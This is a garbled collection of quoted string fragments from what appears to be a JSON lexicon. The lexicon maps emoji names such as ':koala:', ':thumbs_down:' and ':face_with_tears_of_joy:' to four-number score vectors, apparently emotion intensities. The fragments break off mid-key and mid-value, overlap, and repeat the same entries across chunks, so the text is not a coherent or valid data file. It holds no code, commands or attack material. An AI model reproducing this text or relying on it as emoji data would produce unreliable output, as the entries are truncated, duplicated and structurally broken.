\":right_arrow_curving_up:\": [0.262, 0.255, 0.222, 0.22899999999999998],", "0.4, 0.158], \":artist_palette:\": [0.136, 0.11800000000000001, 0.442, 0.057999999999999996], \":battery:\": [0.08199999999999999, 0.179, 0.196, 0.111], \":face_with_steam_from_nose:\":", "0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155, 0.179, 0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999, 0.109], \":paperclip:\":", "\":school:\": [0.15, 0.268, 0.29600000000000004, 0.162], \":newspaper:\": [0.222, 0.33799999999999997, 0.27, 0.24600000000000002], \":right_arrow_curving_left:\": [0.18100000000000002, 0.292,", "[0.168, 0.284, 0.17, 0.17800000000000002], \":high_voltage:\": [0.252, 0.244, 0.147, 0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184,", "0.166], \":floppy_disk:\": [0.168, 0.324, 0.341, 0.308], \":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003, 0.217], \":Japanese_castle:\": [0.092,", "0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09, 0.251, 0.326, 0.18100000000000002], \":page_facing_up:\": [0.196, 0.31, 0.3, 0.29], \":notebook:\":", "\":blowfish:\": [0.21, 0.214, 0.155, 0.138], \":bear_face:\": [0.205, 0.256, 0.129, 0.196], \":keycap_10:\": [0.217, 0.109,", "[0.493, 0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998, 0.228], \":ear:\": [0.299, 0.33, 0.316,", "0.196, 0.237, 0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32, 0.22699999999999998], \":sake:\": [0.145, 0.255, 0.282, 0.145],", "0.017, 0.10800000000000001], \":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\": [0.188, 0.228, 0.128, 0.248], \":wavy_dash:\":", "0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162, 0.255, 0.19899999999999998], \":waxing_gibbous_moon:\": [0.18100000000000002, 0.245, 0.327, 0.221], \":penguin:\":", "0.043, 0.22], \":white_medium_square:\": [0.395, 0.255, 0.16899999999999998, 0.231], \":flag_in_hole:\": [0.134, 0.207, 0.222, 0.175], \":person_running:\":", "0.13699999999999998], \":grimacing_face:\": [0.161, 0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\": [0.092, 0.163, 0.158, 0.055], \":fork_and_knife:\": [0.053,", "[0.318, 0.467, 0.131, 0.39399999999999996], \":fireworks:\": [0.051, 0.165, 0.191, 0.165], \":tongue:\": [0.316, 0.062, 0.136,", "0.096, 0.166, 0.121], \":fax_machine:\": [0.24100000000000002, 0.35200000000000004, 0.16699999999999998, 0.226], \":baseball:\": [0.14300000000000002, 0.242, 0.099, 0.369],", "[0.14800000000000002, 0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237, 0.28], \":moai:\": [0.131, 0.153, 0.11800000000000001,", "0.225, 0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001, 0.077, 0.069, 0.166], \":angry_face_with_horns:\": [0.385, 0.257, 0.03, 0.21100000000000002],", "0.257, 0.304], \":pig_face:\": [0.179, 0.214, 0.165, 0.337], \":hamster_face:\": [0.215, 0.196, 0.305, 0.19399999999999998], \":police_officer:\":", "\":alarm_clock:\": [0.17600000000000002, 0.28, 0.154, 0.22699999999999998], \":wine_glass:\": [0.046, 0.124, 0.218, 0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999,", "0.261, 0.23800000000000002, 0.295], \":yellow_heart:\": [0.158, 0.177, 0.27, 0.262], \":Gemini:\": [0.228, 0.132, 0.262, 0.177],", "0.158, 0.205], \":megaphone:\": [0.239, 0.214, 0.16699999999999998, 0.22], \":bug:\": [0.268, 0.27, 0.174, 0.102], \":blowfish:\":", "0.16899999999999998, 0.091], \":woman’s_sandal:\": [0.24600000000000002, 0.23600000000000002, 0.20800000000000002, 0.23], \":man:\": [0.243, 0.131, 0.29100000000000004, 0.098], \":ghost:\":", "0.222, 0.289], \":saxophone:\": [0.107, 0.16, 0.244, 0.21600000000000003], \":raising_hands:\": [0.122, 0.10099999999999999, 0.254, 0.23600000000000002], \":up_arrow:\":", "\":barber_pole:\": [0.135, 0.163, 0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226, 0.251], \":input_numbers:\": [0.174, 0.18600000000000003,", "0.126, 0.17600000000000002], \":kiss:\": [0.188, 0.122, 0.358, 0.22699999999999998], \":closed_umbrella:\": [0.136, 0.20199999999999999, 0.201, 0.295], \":waving_hand:\":", "0.237], \":beer_mug:\": [0.157, 0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16, 0.184, 0.09, 0.159], \":crying_face:\": [0.284,", "0.24], \":black_medium-small_square:\": [0.392, 0.21100000000000002, 0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259, 0.142, 0.46, 0.299], \":downwards_button:\": [0.195,", "0.12300000000000001, 0.149], \":face_with_medical_mask:\": [0.436, 0.34600000000000003, 0.159, 0.406], \":telephone:\": [0.257, 0.204, 0.221, 0.267], \":trophy:\":", "[0.126, 0.335, 0.21, 0.264], \":unamused_face:\": [0.418, 0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09, 0.251, 0.326,", "0.136], \":sun:\": [0.11, 0.251, 0.267, 0.18], \":rose:\": [0.129, 0.161, 0.33399999999999996, 0.19899999999999998], \":bread:\": [0.142,", "\":telephone_receiver:\": [0.179, 0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\": [0.188, 0.228, 0.128, 0.248], \":wavy_dash:\": [0.235, 0.287,", "0.21100000000000002, 0.18600000000000003, 0.255], \":backhand_index_pointing_up:\": [0.259, 0.142, 0.46, 0.299], \":downwards_button:\": [0.195, 0.258, 0.182, 0.225],", "0.284, 0.196], \":meat_on_bone:\": [0.177, 0.218, 0.213, 0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29], \":television:\":", "0.078, 0.11599999999999999, 0.226], \":purse:\": [0.105, 0.196, 0.302, 0.20199999999999999], \":old_man:\": [0.27, 0.263, 0.276, 0.215],", "0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079, 0.151, 0.24, 0.247], \":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003, 0.175],", "0.263], \":couple_with_heart:\": [0.165, 0.113, 0.409, 0.25], \":relieved_face:\": [0.127, 0.182, 0.254, 0.13699999999999998], \":grimacing_face:\": [0.161,", "0.179, 0.191, 0.302], \":cooking:\": [0.078, 0.221, 0.139, 0.11800000000000001], \":slot_machine:\": [0.085, 0.16899999999999998, 0.067, 0.23],", "\":foggy:\": [0.162, 0.301, 0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251, 0.239, 0.08], \":Tokyo_tower:\": [0.115, 0.092,", "\":bikini:\": [0.13, 0.132, 0.177, 0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175, 0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002,", "0.185, 0.205, 0.191], \":fearful_face:\": [0.344, 0.389, 0.08800000000000001, 0.332], \":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235],", "\":hotel:\": [0.075, 0.24600000000000002, 0.196, 0.184], \":lipstick:\": [0.276, 0.168, 0.502, 0.141], \":smiling_face_with_halo:\": [0.10800000000000001, 0.092,", "\":person_swimming:\": [0.175, 0.159, 0.086, 0.245], \":ogre:\": [0.37, 0.419, 0.109, 0.257], \":chart_increasing:\": [0.22399999999999998, 0.259,", "0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078, 0.121], \":tomato:\": [0.284, 0.22, 0.294, 0.23600000000000002], \":blue_book:\":", "\":castle:\": [0.069, 0.20199999999999999, 0.132, 0.222], \":bookmark_tabs:\": [0.13699999999999998, 0.228, 0.301, 0.23], \":face_savoring_food:\": [0.128, 0.107,", "0.162], \":baby_chick:\": [0.156, 0.23800000000000002, 0.125, 0.057], \":snail:\": [0.162, 0.239, 0.19899999999999998, 0.17], \":cat_face:\": [0.147,", "0.125, 0.17300000000000001], \":cinema:\": [0.273, 0.207, 0.20600000000000002, 0.218], \":people_with_bunny_ears:\": [0.24100000000000002, 0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\":", "[0.035, 0.34299999999999997, 0.129, 0.23800000000000002], \":honeybee:\": [0.381, 0.285, 0.128, 0.111], \":rabbit_face:\": [0.165, 0.222, 0.217,", "0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\": [0.063, 0.271, 0.14, 0.122], \":paw_prints:\": [0.266,", "0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3, 0.474, 0.145, 0.391], \":Christmas_tree:\": [0.13699999999999998, 0.17, 0.285, 0.081], \":chicken:\":", "[0.19899999999999998, 0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\": [0.098, 0.13699999999999998, 0.287,", "0.18, 0.102, 0.16399999999999998], \":Virgo:\": [0.17, 0.109, 0.264, 0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003, 0.168],", "0.245, 0.17600000000000002], \":skis:\": [0.10300000000000001, 0.077, 0.051, 0.192], \":clapping_hands:\": [0.21899999999999997, 0.256, 0.18899999999999997, 0.214], \":kiss_mark:\":", "0.245, 0.21, 0.264], \":Capricorn:\": [0.196, 0.172, 0.3, 0.179], \":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004, 0.204],", "\":paw_prints:\": [0.266, 0.249, 0.129, 0.155], \":running_shoe:\": [0.23199999999999998, 0.094, 0.08900000000000001, 0.185], \":sad_but_relieved_face:\": [0.3, 0.474,", "0.256, 0.129, 0.196], \":keycap_10:\": [0.217, 0.109, 0.086, 0.17300000000000001], \":kissing_face_with_closed_eyes:\": [0.179, 0.08, 0.217, 0.168],", "0.2], \":fast_down_button:\": [0.287, 0.247, 0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155, 0.179, 0.17600000000000002], \":koala:\": [0.11900000000000001,", "0.226], \":purse:\": [0.105, 0.196, 0.302, 0.20199999999999999], \":old_man:\": [0.27, 0.263, 0.276, 0.215], \":calendar:\": [0.174,", "0.27899999999999997], \":optical_disk:\": [0.22, 0.165, 0.332, 0.261], \":magnifying_glass_tilted_left:\": [0.222, 0.276, 0.203, 0.131], \":Sagittarius:\": [0.17,", "0.242, 0.10300000000000001, 0.175], \":wedding:\": [0.092, 0.139, 0.631, 0.252], \":money_bag:\": [0.185, 0.17300000000000001, 0.14300000000000002, 0.177],", "0.18600000000000003], \":black_medium_square:\": [0.445, 0.245, 0.21, 0.264], \":Capricorn:\": [0.196, 0.172, 0.3, 0.179], \":pool_8_ball:\": [0.257,", "0.077, 0.069, 0.166], \":angry_face_with_horns:\": [0.385, 0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256, 0.138],", "[0.213, 0.055, 0.081, 0.193], \":up-left_arrow:\": [0.193, 0.214, 0.18600000000000003, 0.124], \":joker:\": [0.233, 0.28600000000000003, 0.051,", "[0.183, 0.16, 0.292, 0.242], \":blond-haired_person:\": [0.257, 0.23, 0.226, 0.166], \":love_letter:\": [0.13, 0.15, 0.331,", "[0.187, 0.222, 0.316, 0.361], \":guitar:\": [0.14400000000000002, 0.125, 0.257, 0.304], \":pig_face:\": [0.179, 0.214, 0.165,", "\":melon:\": [0.282, 0.313, 0.262, 0.077], \":strawberry:\": [0.153, 0.198, 0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223,", "0.079, 0.061], \":bookmark:\": [0.257, 0.174, 0.182, 0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078, 0.121], \":tomato:\":", "0.239, 0.28800000000000003, 0.122], \":currency_exchange:\": [0.159, 0.20800000000000002, 0.127, 0.226], \":house_with_garden:\": [0.115, 0.24, 0.268, 0.153],", "\":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321, 0.496,", "0.175, 0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381, 0.231, 0.099, 0.326], \":neutral_face:\":", "0.201, 0.295], \":waving_hand:\": [0.256, 0.252, 0.146, 0.19899999999999998], \":rice_cracker:\": [0.24100000000000002, 0.156, 0.111, 0.153], \":speak-no-evil_monkey:\":", "[0.304, 0.1, 0.319, 0.145], \":clapper_board:\": [0.213, 0.196, 0.237, 0.162], \":first_quarter_moon_face:\": [0.11, 0.10300000000000001, 0.32,", "0.147, 0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184, 0.086], \":thumbs_down:\": [0.442, 0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\":", "[0.203, 0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381, 0.231, 0.099, 0.326], \":neutral_face:\": [0.415, 0.309, 0.149,", "0.139, 0.155, 0.087], \":electric_plug:\": [0.124, 0.14, 0.078, 0.139], \":cloud:\": [0.18, 0.231, 0.266, 0.295],", "[0.257, 0.23, 0.226, 0.166], \":love_letter:\": [0.13, 0.15, 0.331, 0.142], \":bomb:\": [0.22, 0.196, 0.163,", "0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\": [0.168, 0.324, 0.341, 0.308], \":orange_book:\": [0.18100000000000002, 0.193, 0.18600000000000003, 0.217],", "0.213, 0.187, 0.27899999999999997], \":performing_arts:\": [0.159, 0.10800000000000001, 0.204, 0.162], \":baby_chick:\": [0.156, 0.23800000000000002, 0.125, 0.057],", "[0.222, 0.121, 0.237, 0.28], \":moai:\": [0.131, 0.153, 0.11800000000000001, 0.095], \":wolf_face:\": [0.185, 0.289, 0.083,", "\":disappointed_face:\": [0.318, 0.467, 0.131, 0.39399999999999996], \":fireworks:\": [0.051, 0.165, 0.191, 0.165], \":tongue:\": [0.316, 0.062,", "[0.139, 0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\": [0.11, 0.251, 0.267,", "0.251, 0.12300000000000001, 0.079], \":new_moon:\": [0.239, 0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174, 0.11, 0.17300000000000001],", "0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001, 0.19699999999999998, 0.14300000000000002, 0.131], \":downcast_face_with_sweat:\": [0.321, 0.496, 0.17300000000000001, 0.447],", "0.179], \":oden:\": [0.12300000000000001, 0.077, 0.069, 0.166], \":angry_face_with_horns:\": [0.385, 0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203,", "0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\": [0.098, 0.13699999999999998, 0.287, 0.218], \":ferris_wheel:\": [0.092, 0.168, 0.141, 0.156],", "\":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095, 0.127, 0.239], \":syringe:\": [0.21, 0.245,", "\":broken_heart:\": [0.244, 0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001, 0.135], \":cactus:\": [0.087, 0.245,", "0.289], \":cat_face_with_wry_smile:\": [0.25, 0.083, 0.078, 0.121], \":tomato:\": [0.284, 0.22, 0.294, 0.23600000000000002], \":blue_book:\": [0.156,", "\":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001, 0.135], \":cactus:\": [0.087, 0.245, 0.192, 0.034], \":gem_stone:\": [0.17300000000000001, 0.073,", "0.079], \":new_moon:\": [0.239, 0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193,", "0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\": [0.113, 0.196, 0.111, 0.204], \":monkey_face:\": [0.19399999999999998, 0.327, 0.079, 0.061],", "0.327, 0.221], \":penguin:\": [0.151, 0.188, 0.134, 0.141], \":cow_face:\": [0.142, 0.222, 0.129, 0.185], \":tiger_face:\":", "0.18, 0.257, 0.084], \":no_one_under_eighteen:\": [0.109, 0.136, 0.051, 0.179], \":left-right_arrow:\": [0.32899999999999996, 0.37200000000000005, 0.214, 0.335],", "[0.151, 0.217, 0.158, 0.205], \":megaphone:\": [0.239, 0.214, 0.16699999999999998, 0.22], \":bug:\": [0.268, 0.27, 0.174,", "[0.24600000000000002, 0.276, 0.198, 0.272], \":hamburger:\": [0.177, 0.122, 0.18600000000000003, 0.113], \":necktie:\": [0.20199999999999999, 0.094, 0.11199999999999999,", "[0.131, 0.16699999999999998, 0.147, 0.102], \":person_wearing_turban:\": [0.212, 0.293, 0.302, 0.239], \":crystal_ball:\": [0.16899999999999998, 0.22, 0.354,", "0.17800000000000002], \":high_voltage:\": [0.252, 0.244, 0.147, 0.228], \":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184, 0.086], \":thumbs_down:\": [0.442,", "0.138, 0.139], \":pager:\": [0.14400000000000002, 0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134, 0.35200000000000004], \":tropical_drink:\":", "0.251], \":input_numbers:\": [0.174, 0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\": [0.349, 0.397, 0.09699999999999999, 0.348], \":foggy:\": [0.162,", "[0.165, 0.222, 0.217, 0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997, 0.145, 0.313], \":anchor:\": [0.22, 0.179, 0.245,", "0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001, 0.175],", "\":honey_pot:\": [0.177, 0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\": [0.301, 0.29,", "0.239, 0.11599999999999999], \":maple_leaf:\": [0.27899999999999997, 0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34, 0.265], \":school:\":", "0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001, 0.135], \":cactus:\": [0.087, 0.245, 0.192, 0.034], \":gem_stone:\":", "0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381, 0.231, 0.099, 0.326], \":neutral_face:\": [0.415, 0.309, 0.149, 0.322], \":ant:\":", "0.11, 0.052000000000000005, 0.18], \":revolving_hearts:\": [0.2, 0.09699999999999999, 0.42700000000000005, 0.142], \":spaghetti:\": [0.055999999999999994, 0.149, 0.149, 0.159],", "[0.147, 0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998, 0.091, 0.153], \":four_o’clock:\": [0.165, 0.361, 0.171,", "0.18100000000000002, 0.264, 0.14300000000000002], \":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\": [0.301, 0.29, 0.235, 0.20199999999999999],", "[0.259, 0.187, 0.154, 0.348], \":small_blue_diamond:\": [0.23, 0.18100000000000002, 0.24600000000000002, 0.23199999999999998], \":grinning_cat_face_with_smiling_eyes:\": [0.12, 0.161, 0.17600000000000002,", "0.187], \":nut_and_bolt:\": [0.18100000000000002, 0.276, 0.175, 0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381,", "[0.203, 0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225, 0.251, 0.231, 0.204], \":down_arrow:\": [0.33899999999999997, 0.268, 0.142,", "[0.14400000000000002, 0.196, 0.23800000000000002, 0.222], \":broken_heart:\": [0.244, 0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\": [0.183, 0.27, 0.08900000000000001,", "[0.161, 0.32799999999999996, 0.1, 0.21100000000000002], \":lollipop:\": [0.092, 0.163, 0.158, 0.055], \":fork_and_knife:\": [0.053, 0.078, 0.126,", "0.247, 0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\": [0.204, 0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\":", "\":upwards_button:\": [0.264, 0.261, 0.23800000000000002, 0.295], \":yellow_heart:\": [0.158, 0.177, 0.27, 0.262], \":Gemini:\": [0.228, 0.132,", "0.092, 0.28, 0.12300000000000001], \":smirking_face:\": [0.258, 0.040999999999999995, 0.096, 0.146], \":face_screaming_in_fear:\": [0.292, 0.263, 0.133, 0.21],", "\":banana:\": [0.21899999999999997, 0.29600000000000004, 0.184, 0.086], \":thumbs_down:\": [0.442, 0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099,", "[0.27899999999999997, 0.172, 0.20800000000000002, 0.147], \":musical_keyboard:\": [0.132, 0.10800000000000001, 0.34, 0.265], \":school:\": [0.15, 0.268, 0.29600000000000004,", "0.214, 0.146], \":pushpin:\": [0.299, 0.263, 0.136, 0.177], \":anguished_face:\": [0.309, 0.485, 0.14, 0.369], \":flushed_face:\":", "0.359], \":blue_heart:\": [0.14800000000000002, 0.064, 0.28600000000000003, 0.281], \":Japanese_symbol_for_beginner:\": [0.222, 0.121, 0.237, 0.28], \":moai:\": [0.131,", "0.23600000000000002], \":up_arrow:\": [0.382, 0.293, 0.21899999999999997, 0.284], \":teacup_without_handle:\": [0.156, 0.237, 0.429, 0.07], \":page_with_curl:\": [0.201,", "0.29, 0.142], \":two_hearts:\": [0.172, 0.08800000000000001, 0.38299999999999995, 0.142], \":dollar_banknote:\": [0.21, 0.19, 0.149, 0.192], \":camera:\":", "0.446], \":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09, 0.226, 0.113, 0.18600000000000003], \":black_medium_square:\": [0.445,", "[0.142, 0.205, 0.18100000000000002, 0.156], \":hotel:\": [0.075, 0.24600000000000002, 0.196, 0.184], \":lipstick:\": [0.276, 0.168, 0.502,", "0.266], \":movie_camera:\": [0.142, 0.17800000000000002, 0.233, 0.158], \":eleven_o’clock:\": [0.12300000000000001, 0.282, 0.11900000000000001, 0.316], \":bridge_at_night:\": [0.079,", "0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122, 0.315],", "0.309], \":red_triangle_pointed_up:\": [0.321, 0.243, 0.25, 0.214], \":grinning_face_with_sweat:\": [0.19, 0.307, 0.23199999999999998, 0.27699999999999997], \":loudly_crying_face:\": [0.24600000000000002,", "\":bento_box:\": [0.136, 0.16, 0.159, 0.212], \":woman’s_clothes:\": [0.20800000000000002, 0.154, 0.179, 0.242], \":goblin:\": [0.42, 0.35,", "\":new_moon:\": [0.239, 0.221, 0.258, 0.29100000000000004], \":man’s_shoe:\": [0.276, 0.174, 0.11, 0.17300000000000001], \":bride_with_veil:\": [0.193, 0.268,", "0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001, 0.09699999999999999, 0.136], \":sun:\": [0.11, 0.251, 0.267, 0.18],", "0.27], \":green_heart:\": [0.126, 0.159, 0.373, 0.19], \":input_latin_letters:\": [0.134, 0.126, 0.166, 0.121], \":weary_face:\": [0.23600000000000002,", "[0.16, 0.188, 0.405, 0.102], \":bust_in_silhouette:\": [0.294, 0.34700000000000003, 0.18600000000000003, 0.27899999999999997], \":woman_dancing:\": [0.11199999999999999, 0.11599999999999999, 0.138,", "0.502, 0.185], \":skull:\": [0.36200000000000004, 0.267, 0.055999999999999994, 0.218], \":pill:\": [0.195, 0.253, 0.182, 0.203], \":package:\":", "[0.18100000000000002, 0.276, 0.175, 0.17800000000000002], \":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381, 0.231, 0.099,", "0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196, 0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225, 0.142, 0.205], \":horse_face:\": [0.254,", "0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\": [0.204, 0.298, 0.24100000000000002, 0.19699999999999998], \":person_bowing:\": [0.256, 0.331, 0.262, 0.299],", "0.23], \":flexed_biceps:\": [0.225, 0.251, 0.231, 0.204], \":down_arrow:\": [0.33899999999999997, 0.268, 0.142, 0.252], \":snowboarder:\": [0.13699999999999998,", "0.177], \":dolphin:\": [0.107, 0.184, 0.11699999999999999, 0.204], \":t-shirt:\": [0.21899999999999997, 0.078, 0.11599999999999999, 0.226], \":purse:\": [0.105,", "\":reverse_button:\": [0.256, 0.262, 0.114, 0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001, 0.336, 0.193], \":trident_emblem:\": [0.228, 0.14400000000000002,", "0.046], \":Japanese_dolls:\": [0.053, 0.14, 0.07, 0.08], \":chart_decreasing:\": [0.28800000000000003, 0.396, 0.294, 0.38299999999999995], \":upwards_button:\": [0.264,", "\":cat_face:\": [0.147, 0.185, 0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998, 0.091, 0.153], \":four_o’clock:\": [0.165, 0.361,", "\":fork_and_knife:\": [0.053, 0.078, 0.126, 0.285], \":pile_of_poo:\": [0.35, 0.342, 0.151, 0.446], \":large_blue_diamond:\": [0.249, 0.053,", "\":black_square_button:\": [0.361, 0.212, 0.235, 0.228], \":winking_face:\": [0.098, 0.053, 0.129, 0.171], \":light_bulb:\": [0.237, 0.19899999999999998,", "[0.381, 0.231, 0.099, 0.326], \":neutral_face:\": [0.415, 0.309, 0.149, 0.322], \":ant:\": [0.26899999999999996, 0.308, 0.098,", "0.251, 0.326, 0.18100000000000002], \":page_facing_up:\": [0.196, 0.31, 0.3, 0.29], \":notebook:\": [0.128, 0.14400000000000002, 0.281, 0.174],", "0.341, 0.222, 0.24600000000000002], \":night_with_stars:\": [0.09, 0.174, 0.298, 0.289], \":tulip:\": [0.175, 0.245, 0.37, 0.188],", "0.34700000000000003, 0.165, 0.349], \":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002, 0.222], \":broken_heart:\": [0.244, 0.34, 0.19899999999999998, 0.332],", "0.191, 0.22899999999999998, 0.259], \":anxious_face_with_sweat:\": [0.34299999999999997, 0.439, 0.134, 0.35200000000000004], \":tropical_drink:\": [0.14400000000000002, 0.17800000000000002, 0.159, 0.11900000000000001],", "[0.184, 0.19699999999999998, 0.188, 0.149], \":folded_hands:\": [0.187, 0.17800000000000002, 0.485, 0.35100000000000003], \":musical_note:\": [0.26, 0.191, 0.341,", "0.172, 0.309], \":white_medium-small_square:\": [0.305, 0.22699999999999998, 0.126, 0.187], \":white_large_square:\": [0.348, 0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\":", "\":tropical_fish:\": [0.063, 0.271, 0.14, 0.122], \":paw_prints:\": [0.266, 0.249, 0.129, 0.155], \":running_shoe:\": [0.23199999999999998, 0.094,", "0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128, 0.355], \":alarm_clock:\": [0.17600000000000002, 0.28, 0.154, 0.22699999999999998], \":wine_glass:\":", "0.161, 0.138, 0.185], \":ear_of_corn:\": [0.141, 0.156, 0.182, 0.16699999999999998], \":pot_of_food:\": [0.18, 0.149, 0.177, 0.193],", "0.152, 0.10800000000000001], \":candy:\": [0.192, 0.184, 0.188, 0.12], \":Leo:\": [0.24100000000000002, 0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\":", "[0.159, 0.10800000000000001, 0.204, 0.162], \":baby_chick:\": [0.156, 0.23800000000000002, 0.125, 0.057], \":snail:\": [0.162, 0.239, 0.19899999999999998,", "\":flushed_face:\": [0.281, 0.263, 0.102, 0.231], \":person_frowning:\": [0.34600000000000003, 0.374, 0.145, 0.42100000000000004], \":smiling_face:\": [0.095, 0.13,", "0.193, 0.275, 0.161], \":watermelon:\": [0.152, 0.14300000000000002, 0.133, 0.071], \":glasses:\": [0.157, 0.17800000000000002, 0.12300000000000001, 0.149],", "0.133, 0.111, 0.18899999999999997], \":trumpet:\": [0.128, 0.17800000000000002, 0.20600000000000002, 0.221], \":mouth:\": [0.245, 0.136, 0.321, 0.121],", "\":alien:\": [0.15, 0.231, 0.155, 0.152], \":name_badge:\": [0.26899999999999996, 0.25, 0.147, 0.201], \":sheaf_of_rice:\": [0.188, 0.259,", "\":tangerine:\": [0.16899999999999998, 0.19899999999999998, 0.284, 0.237], \":beer_mug:\": [0.157, 0.12, 0.16699999999999998, 0.09699999999999999], \":spouting_whale:\": [0.16, 0.184,", "[0.18, 0.231, 0.266, 0.295], \":watch:\": [0.183, 0.276, 0.172, 0.235], \":church:\": [0.20800000000000002, 0.276, 0.773,", "[0.076, 0.188, 0.326, 0.057999999999999996], \":face_without_mouth:\": [0.34, 0.335, 0.15, 0.359], \":blue_heart:\": [0.14800000000000002, 